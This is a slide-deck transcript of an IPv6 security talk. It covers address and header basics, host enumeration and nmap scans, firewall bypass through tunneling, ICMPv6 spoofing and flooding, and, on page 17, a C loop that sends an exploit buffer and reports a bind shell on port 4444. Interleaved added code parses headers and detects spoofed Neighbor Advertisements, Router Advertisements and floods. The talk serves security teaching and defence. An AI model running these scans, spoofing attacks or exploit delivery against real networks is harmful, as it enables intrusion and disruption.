IPv6 Fundamentals & Securities
Don Anto, IPSECS.COM

Upload: don-anto

Post on 20-Jun-2015


Page 1: IPv6 Fundamentals & Securities

IPv6 Fundamentals & Securities

Don Anto, IPSECS.COM

Page 2

Who?

• Don Anto
• Information security manager
• JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF
• A dead security researcher
• Involved in the security field for almost 10 years
• Genius evil thinker; professional troublemaker
• @djantoxz

Page 3

IPv6 - Why?

• Analog-to-digital convergence (e.g. Voice over IP)
• The use of virtualization (e.g. cloud)
• Embedded device (smartphone, RFID) networking
• All of these increase the need for unique IP addresses
• So, more IP address space is required!
• Finally, IPv4 address exhaustion

Page 4

IPv6 - What?

• The latest version of the Internet Protocol (IP), intended to replace IPv4
• 128-bit IP addressing instead of 32-bit, to multiply the IP address space
• IPv4 = 2^32 (4,294,967,296) vs IPv6 = 2^128 (about 3.4×10^38)
• Dotted decimal is no longer used; hexadecimal groups separated by colons are used instead
• E.g.:
  • 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092
  • 2001:470:0:64::2
  • fe80::1
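The colon-hex notation lets one address be written several ways (leading zeros dropped, the longest run of zero groups collapsed to "::"), so an ACL, SIEM search or allow-list that compares addresses as strings can miss matches. The following is an added example, not from the slides: a small expander and RFC 5952 compressor that yields one canonical spelling, cross-checked against Python's ipaddress module.

```python
import ipaddress

def expand_ipv6(text: str) -> list[int]:
    """Return the eight 16-bit groups of an IPv6 address written in any valid form.
    Embedded IPv4 notation (::ffff:192.0.2.1) is deliberately not handled here."""
    if text.count("::") > 1:
        raise ValueError("at most one '::' is allowed")
    head, sep, tail = text.partition("::")
    # "" -> []; an empty group as in "1:::2" makes int("", 16) raise ValueError
    left = [int(g, 16) for g in head.split(":")] if head else []
    right = [int(g, 16) for g in tail.split(":")] if tail else []
    missing = 8 - len(left) - len(right)
    if (sep and missing < 1) or (not sep and missing != 0):
        raise ValueError(f"wrong number of groups in {text!r}")
    groups = left + [0] * missing + right if sep else left
    if any(not 0 <= g <= 0xFFFF for g in groups):
        raise ValueError("group out of range")
    return groups

def compress_ipv6(groups: list[int]) -> str:
    """RFC 5952 text: lowercase hex, no leading zeros, longest run of >=2 zero groups as '::'."""
    best_start, best_len, run_start = -1, 0, None
    for i, g in enumerate(groups + [-1]):          # sentinel closes a trailing zero run
        if g == 0 and run_start is None:
            run_start = i
        elif g != 0 and run_start is not None:
            if i - run_start > best_len:           # ties keep the first (leftmost) run
                best_start, best_len = run_start, i - run_start
            run_start = None
    hexes = [format(g, "x") for g in groups]
    if best_len < 2:                               # a single zero group is never compressed
        return ":".join(hexes)
    return ":".join(hexes[:best_start]) + "::" + ":".join(hexes[best_start + best_len:])

def canonical(text: str) -> str:
    return compress_ipv6(expand_ipv6(text))

def is_valid_ipv6(text: str) -> bool:
    try:
        expand_ipv6(text)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    for a in ["2001:470:0000:0064:0000:0000:0000:0002", "FE80::1", "2001:db8:0:0:1:0:0:1"]:
        assert canonical(a) == str(ipaddress.IPv6Address(a))   # cross-check with the stdlib
        print(f"{a:40} -> {canonical(a)}")
```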

Page 5

IPv6 Fundamentals

• IPv6 header: 40 bytes, fixed length
• Source address 16 bytes, destination address 16 bytes
• 8 bytes for version, traffic class, flow label, payload length, next header, & hop limit

Source: Fernando Gont Presentation
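To make the 40-byte layout above concrete, here is an added example (not from the slides or the cited Gont material) that packs and unpacks the fixed header with Python's struct module. The sample packet is constructed in the block; the field widths follow RFC 8200.

```python
import ipaddress
import struct

IPV6_HEADER_LEN = 40
NEXT_HEADER_NAMES = {6: "TCP", 17: "UDP", 58: "ICMPv6"}

def parse_ipv6_header(packet: bytes) -> dict:
    """Decode the 40-byte fixed header; raises on truncated or non-IPv6 input."""
    if len(packet) < IPV6_HEADER_LEN:
        raise ValueError(f"need {IPV6_HEADER_LEN} bytes, got {len(packet)}")
    # The first 32-bit word packs version (4 bits), traffic class (8) and flow label (20).
    first_word, payload_len, next_hdr, hop_limit = struct.unpack("!IHBB", packet[:8])
    version = first_word >> 28
    if version != 6:
        raise ValueError(f"not an IPv6 packet (version {version})")
    return {
        "version": version,
        "traffic_class": (first_word >> 20) & 0xFF,
        "flow_label": first_word & 0xFFFFF,
        "payload_length": payload_len,
        "next_header": NEXT_HEADER_NAMES.get(next_hdr, str(next_hdr)),
        "hop_limit": hop_limit,
        "src": str(ipaddress.IPv6Address(packet[8:24])),
        "dst": str(ipaddress.IPv6Address(packet[24:40])),
        # Unlike IPv4's total length, payload length excludes the fixed header itself.
        "expected_total_len": IPV6_HEADER_LEN + payload_len,
    }

def build_ipv6_header(src: str, dst: str, payload_len: int, next_hdr: int,
                      hop_limit: int = 64, traffic_class: int = 0, flow_label: int = 0) -> bytes:
    """Encode a fixed header (constructed test data, the inverse of parse_ipv6_header)."""
    first_word = (6 << 28) | ((traffic_class & 0xFF) << 20) | (flow_label & 0xFFFFF)
    return (struct.pack("!IHBB", first_word, payload_len, next_hdr, hop_limit)
            + ipaddress.IPv6Address(src).packed + ipaddress.IPv6Address(dst).packed)

# Constructed sample: an ICMPv6 packet from a link-local host to the all-nodes group ff02::1.
SAMPLE = build_ipv6_header("fe80::a00:27ff:fe39:6f0a", "ff02::1", payload_len=64,
                           next_hdr=58, traffic_class=0xB8, flow_label=0x12345)

if __name__ == "__main__":
    for name, value in parse_ipv6_header(SAMPLE).items():
        print(f"{name:20} {value}")
```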

Page 6

IPv6 Fundamentals

• IPv6 address types:
  • Loopback
  • Unspecified
  • Multicast
  • Anycast
  • Local unicast
  • Global unicast
• Subnetting
• Routing

Source: Fernando Gont Presentation

Page 7

v4 vs v6

Source: Fernando Gont Presentation

Page 8

v4 to v6

• Dual-stack systems to support IPv4 & IPv6 concurrently
• Tunneling mechanisms to encapsulate IPv6 inside IPv4
  • 6to4, 6in4, Teredo, ISATAP
• Network Address Translation (NAT)
  • Network Address Translation – Protocol Translation (NAT-PT)
  • Network Address Translation – IPv6 to IPv4 (NAT-64)
• Free IPv6 Tunnel Broker?

Page 9

Security Issues

• Large IPv6 address space (enumeration, scanning, managing)
• The use of tunneling? The use of dual-stack networking?
• Weaknesses in IPv6 itself? (protocol-level vulnerabilities)
• Weaknesses of applications running on IPv6

Page 10

Enumeration

• Discovery through the multicast address (FF02::1)
• Discovery through ICMPv6 Echo Request
• Discovery through DNS queries (A vs AAAA)
• Discovery through SNMP queries
• Google helps us find IPv6 domains
• The presence of IPAM may help

ipv6lab -> ./alive6 eth4
Alive: dead:beaf::3
Alive: dead:beaf::1
Found 2 systems alive

ipv6lab-> ping6 -I eth4 ff02::1
PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes
64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms
64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!)
64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!)
ipv6lab-> ip -6 neigh show
fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE
fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE

ipv6lab-> host -t A www.jp.freebsd.org
www.jp.freebsd.org has address 119.245.129.228
ipv6lab-> host -t AAAA www.jp.freebsd.org
www.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092

Page 11

Scanning

• Port scanning (tools with IPv6 support)
• Vulnerability scanning (tools with IPv6 support)

ipv6lab-> nmap -6 -sV -PN -T4 dead:beaf::3

Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT
Interesting ports on dead:beaf::3:
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9 (protocol 2.0)

ipv6lab-> nmap -sV -PN -T4 192.168.137.103

Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT
Interesting ports on 192.168.137.103:
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 5.9 (protocol 2.0)
MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems)

A v4-to-v6 proxy is usually helpful, e.g. socat: apt-get install socat

Page 12

Perimeter Defense Bypass

• Does the firewall protect both the IPv4 and the IPv6 network?
• Does the IDS/IPS protect both the IPv4 and the IPv6 network?
• Teredo tunneling can be used to bypass NAT and to compromise the internal network
• The use of dual stack and tunneling mandates protection for both IPv4 and IPv6

Page 13

Perimeter Defense Bypass

• IPv4 is well governed by the firewall using NAT or policies
• A poorly configured firewall can potentially be bypassed to reach the DMZ over the IPv6 network
• Even worse, someone may directly access the internal network from the Internet

Page 14

Exploiting - Protocols

• IPv6 was also designed to improve on the security of IPv4; unfortunately there is no significant improvement
• Some IPv4 problems still persist in IPv6
• Man-in-the-middle attacks
• Denial-of-service attacks
• More and more

Page 15

Man In The Middle

• Spoofed ICMPv6 Neighbor Advertisement (replacing ARP in v4)
• Spoofed ICMPv6 Router Advertisement
• Spoofed ICMPv6 Redirect or Packet Too Big to inject routing changes
• Rogue DHCPv6 server (replacing the rogue DHCP server in v4)
• More and more

Used to enable packet sniffing

Source Image: OWASP website
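A defender's counterpart to the spoofed NA/RA items above, as an added example that is not part of the slides: an arpwatch-style monitor that learns each IPv6 address's MAC from Neighbor Advertisements, alerts when an address is re-advertised from a different MAC (noting the override flag), and flags Router Advertisements from any MAC not on a router allow-list. The NdMessage records are constructed (a real deployment would fill them from a sniffer); the MAC and link-local values reuse the lab addresses shown on the enumeration slide, and the trusted router MAC is an assumed value.

```python
from dataclasses import dataclass, field

@dataclass
class NdMessage:
    ts: float
    kind: str                 # "NA" (Neighbor Advertisement) or "RA" (Router Advertisement)
    src_mac: str              # link-layer source address of the frame
    target: str               # NA: advertised IPv6 address; RA: the router's link-local address
    override: bool = False    # NA 'O' flag: tells neighbours to replace their cache entry

@dataclass
class NdWatch:
    trusted_router_macs: set
    bindings: dict = field(default_factory=dict)   # IPv6 address -> MAC first seen with it
    alerts: list = field(default_factory=list)

    def observe(self, m: NdMessage) -> None:
        if m.kind == "RA":
            if m.src_mac not in self.trusted_router_macs:
                self.alerts.append(f"{m.ts}: rogue RA for {m.target} from {m.src_mac}")
        elif m.kind == "NA":
            known = self.bindings.get(m.target)
            if known is None:
                self.bindings[m.target] = m.src_mac       # first sighting: learn the binding
            elif known != m.src_mac:
                # The same address now claims a different MAC: the signature of a spoofed NA.
                flag = " with override" if m.override else ""
                self.alerts.append(f"{m.ts}: {m.target} moved {known} -> {m.src_mac}{flag}")

def run_detector(messages, trusted_router_macs) -> list:
    w = NdWatch(set(trusted_router_macs))
    for m in sorted(messages, key=lambda x: x.ts):
        w.observe(m)
    return w.alerts

# Constructed traffic: two hosts advertise normally and the (assumed) real router sends an RA;
# then one host's address is re-advertised from another MAC with O=1, and a non-router sends an RA.
TRUSTED_ROUTERS = ["08:00:27:00:00:01"]
SAMPLE = [
    NdMessage(1.0, "NA", "08:00:27:96:da:90", "fe80::a00:27ff:fe96:da90"),
    NdMessage(1.1, "NA", "08:00:27:6c:ea:37", "fe80::a00:27ff:fe6c:ea37"),
    NdMessage(5.0, "RA", "08:00:27:00:00:01", "fe80::1"),
    NdMessage(9.2, "NA", "08:00:27:6c:ea:37", "fe80::a00:27ff:fe96:da90", override=True),
    NdMessage(9.5, "RA", "08:00:27:6c:ea:37", "fe80::a00:27ff:fe6c:ea37"),
]

if __name__ == "__main__":
    for alert in run_detector(SAMPLE, TRUSTED_ROUTERS):
        print(alert)
```

Legitimate events (a NIC swap, VRRP failover, a VM moving hosts) raise the same binding-change alert, so seed the table from the known-good neighbour cache and review changes rather than blocking on them.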

Page 16

Denial of Services

• Traffic flooding with ICMPv6 RA, NA, NS, MLD, smurfing
• Preventing new IPv6 addresses via DAD
• CPU exhaustion with ICMPv6 NS and a lot of crypto work
• Routing loop attacks that exploit automatic tunneling
• ICMP attacks against TCP to tear down BGP sessions

anto# ifstat -b eth0
      Kbps in  Kbps out
      9851.48      1.08
     10244.34      0.95
     10313.33      0.95
      9165.56      0.95
      9358.11      0.95
     10165.01      0.95
      9802.98      0.95
      9353.34      0.95

anto# tcpdump -n -i eth0 dst host dead:beaf::3

20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24

4700 packets captured
4884 packets received by filter
93 packets dropped by kernel
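Turning the tcpdump excerpt above into detection logic, as an added example that is not from the slides: it parses tcpdump -n lines, flags any packet whose IPv6 source is a multicast address (a spoofed source, as in the smurf-style flood captured here), and keeps a per-destination sliding window to report the packet rate. The six sample lines are constructed (the first five copy the slide's capture), and the 10 ms window and 3-packet threshold are assumptions to tune.

```python
import ipaddress
import re
from collections import defaultdict, deque

# tcpdump -n output as on the slide, e.g.
# 20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
LINE_RE = re.compile(r"^(\d\d):(\d\d):(\d\d)\.(\d{6}) IP6 (\S+) > (\S+): (.*)$")

def parse_line(line: str):
    """Return {t, src, dst, info} for an IP6 tcpdump line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    hh, mm, ss, us, src, dst, info = m.groups()
    t = int(hh) * 3600 + int(mm) * 60 + int(ss) + int(us) / 1e6
    return {"t": t, "src": src, "dst": dst, "info": info}

def analyse(lines, window=0.010, max_pkts=3) -> list:
    """Alert on multicast sources and on > max_pkts packets to one destination within `window` s."""
    alerts = []
    recent = defaultdict(deque)            # dst -> timestamps still inside the window
    for line in lines:
        p = parse_line(line)
        if p is None:
            continue
        # ff00::/8 is never a legitimate source address; seeing it means spoofing.
        if ipaddress.IPv6Address(p["src"]).is_multicast:
            alerts.append(f"spoofed multicast source {p['src']} -> {p['dst']}")
        q = recent[p["dst"]]
        q.append(p["t"])
        while q and p["t"] - q[0] > window:
            q.popleft()
        if len(q) > max_pkts:
            alerts.append(f"flood: {len(q)} pkts to {p['dst']} within {window * 1000:.0f} ms")
    return alerts

# Constructed input: the five lines from the slide plus one ordinary echo request.
SAMPLE_LINES = [
    "20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24",
    "20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24",
    "20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24",
    "20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24",
    "20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24",
    "20:39:50.000000 IP6 fe80::a00:27ff:fe39:6f0a > dead:beaf::3: ICMP6, echo request, seq 1, length 64",
]

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LINES):
        print(alert)
```

In production feed it from tcpdump -n -l -i eth0 ip6 on stdin and pick the thresholds from a baseline of normal ICMPv6 rates on the segment.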

Page 17

Exploiting - Apps

• Buffer overflow
• Remote format string
• Off-by-one
• Web app attacks
• More attacks?!
• There's no big difference
• Socket programming & shellcodes


/* AI walks the addrinfo list returned by getaddrinfo() for argv[1]; s, buffer
   and len are declared earlier in the program. The same loop serves IPv4 and
   IPv6 because the address family comes from each addrinfo entry. */
for (AI = AddrInfo; AI != NULL; AI = AI->ai_next) {
    if ((s = socket(AI->ai_family, AI->ai_socktype, AI->ai_protocol)) < 0) {
        printf("can't create socket\n");
        exit(0);
    }
    if (connect(s, AI->ai_addr, AI->ai_addrlen) < 0) {   /* try the next address if this one is unreachable */
        close(s);
        continue;
    }
    send(s, buffer, len, 0);
    printf("Check your shell on %s TCP port 4444\n", argv[1]);
    close(s);
    break;
}

A v4-to-v6 proxy is usually helpful, e.g. socat: apt-get install socat

Page 18

DEMO

Page 19

Discussion

Page 20

Thank You